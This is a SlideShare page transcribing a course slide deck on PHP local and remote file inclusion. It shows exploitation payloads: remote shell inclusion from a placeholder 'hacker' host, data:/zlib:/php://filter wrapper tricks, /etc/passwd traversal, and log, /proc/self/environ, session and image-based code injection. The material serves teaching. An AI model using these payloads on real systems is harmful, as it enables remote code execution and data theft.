SlideShare une entreprise Scribd logo

LFI

Михаил Фирстов
Михаил Фирстов

Part of course.

Formation
1  sur  19
Télécharger pour lire hors ligne
LFI/RFI Local/Remote File Inclusion
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
PHP functions • include • include_once • require • require_once
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name

Recommandé

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 

Recommandé

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Php
PhpPhp
Phpanandha ganesh
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentationdharmendra kumar dhakar
 
Php Presentation
Php PresentationPhp Presentation
Php PresentationManish Bothra
 
PHP
PHPPHP
PHPMomentum Design Lab
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php IntroductionGeshan Manandhar
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPCollaboration Technologies
 
php
phpphp
phpajeetjhajharia
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Lfi
LfiLfi
Lfipenetration Tester
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsVibrant Technologies & Computers
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and postbaabtra.com - No. 1 supplier of quality freshers
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to phpTaha Malampatti
 
Client side
Client sideClient side
Client sideМихаил Фирстов
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-InjectionМихаил Фирстов
 

Contenu connexe

Tendances

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 

Tendances (20)

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
Php
PhpPhp
Php
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and Frameworks
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentation
 
Php Presentation
Php PresentationPhp Presentation
Php Presentation
 
PHP
PHPPHP
PHP
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php Introduction
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
php
phpphp
php
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHP
 
A History of PHP
A History of PHPA History of PHP
A History of PHP
 
Lfi
LfiLfi
Lfi
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP Fundamentals
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and post
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginners
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to php
 

En vedette

Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Jacqueline Vickery
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foodymrp4
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social businesspiero itta
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyLeandro Rangel
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Ansgar Jahns
 
Intestazione
IntestazioneIntestazione
Intestazionerifugiati
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Irvan R-ID
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthingsBoat Dock
 
parameter tampering
parameter tamperingparameter tampering
parameter tamperingIlsun Choi
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollatanoicattaroweb
 

En vedette (20)

Client side
Client sideClient side
Client side
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-Injection
 
Race condition
Race conditionRace condition
Race condition
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
 
Race condition
Race conditionRace condition
Race condition
 
Attacking MongoDB
Attacking MongoDBAttacking MongoDB
Attacking MongoDB
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
Mongo db eng
Mongo db engMongo db eng
Mongo db eng
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
 
Intestazione
IntestazioneIntestazione
Intestazione
 
PHP
PHPPHP
PHP
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthings
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
 
Quick Wins
Quick WinsQuick Wins
Quick Wins
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollata
 
M Power
M PowerM Power
M Power
 

Similaire à LFI

Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaiUnmesh Baile
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners musrath mohammad
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaivibrantuser
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsMark Baker
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHPNat Weerawan
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy CodeRowan Merewood
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptechQuang Anh Le
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extensionNguyen Duc Phu
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extensionVõ Duy Tuấn
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 

Similaire à LFI (20)

Php with my sql
Php with my sqlPhp with my sql
Php with my sql
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Php Tutorial
Php TutorialPhp Tutorial
Php Tutorial
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensions
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHP
 
Hacking with hhvm
Hacking with hhvmHacking with hhvm
Hacking with hhvm
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy Code
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extension
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extension
 
PHP
PHPPHP
PHP
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 

Dernier

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxRamakrishna Reddy Bijjam
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17Celine George
 
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin ClassesMixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin ClassesCeline George
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxcallscotland1987
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxVishalSingh1417
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsKarakKing
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxAmanpreet Kaur
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxJisc
 

Dernier (20)

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin ClassesMixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptx
 
Spatium Project Simulation student brief
Spatium Project Simulation student briefSpatium Project Simulation student brief
Spatium Project Simulation student brief
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functions
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptx
 

LFI

  • 2. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
  • 3. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
  • 4. WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
  • 5. PHP functions • include • include_once • require • require_once
  • 6. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 7. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 8. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
  • 9. LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
  • 10. RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
  • 11. RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
  • 12. RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
  • 13. RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
  • 14. LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
  • 15. LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
  • 16. LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
